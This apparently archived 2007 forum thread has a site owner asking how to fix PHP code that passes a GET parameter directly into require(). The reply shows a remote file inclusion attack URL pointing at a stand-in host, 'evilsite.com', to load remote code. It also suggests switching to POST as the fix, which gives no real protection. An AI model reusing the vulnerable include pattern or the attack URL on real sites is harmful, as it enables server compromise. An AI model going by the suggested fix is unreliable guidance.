|
Posted by Areric on 01/15/07 18:24
My guess is that all a scammer would need to do would be to pass a
script in the url that would point to something on another server
malicious.
So for example say your site is mysite.com and the name of this script
is mailscript.php
I could navigate to your site as
http://www.mysite.com/mailscript.php?sport=www.evilsite.com/evilscript
Your script would thent ake that whole string
"www.evilsite.com/evilscript" append.php and include it. (the .s and /
would need to be converted to % notation first but same idea).
Fixing it would require you to submit the variable in post, although im
not too sure if thats 100%.
SA SA wrote:
> Hello,
> I do not know anything about PHP but thrown into this mix. I was told
> by my ISP that there is vulnerability in following code to allow
> spammer load an offsite php script for mailing. The defective code is:
>
>
> if (isset($HTTP_GET_VARS['sport']))
> {
> $sport = $HTTP_GET_VARS['sport'];
> require ($sport.".php");
> }
>
>
> how od i fix it?
>
> If i am in wrong group please forgive me.
>
> thanks
> sa
Navigation:
[Reply to this message]
|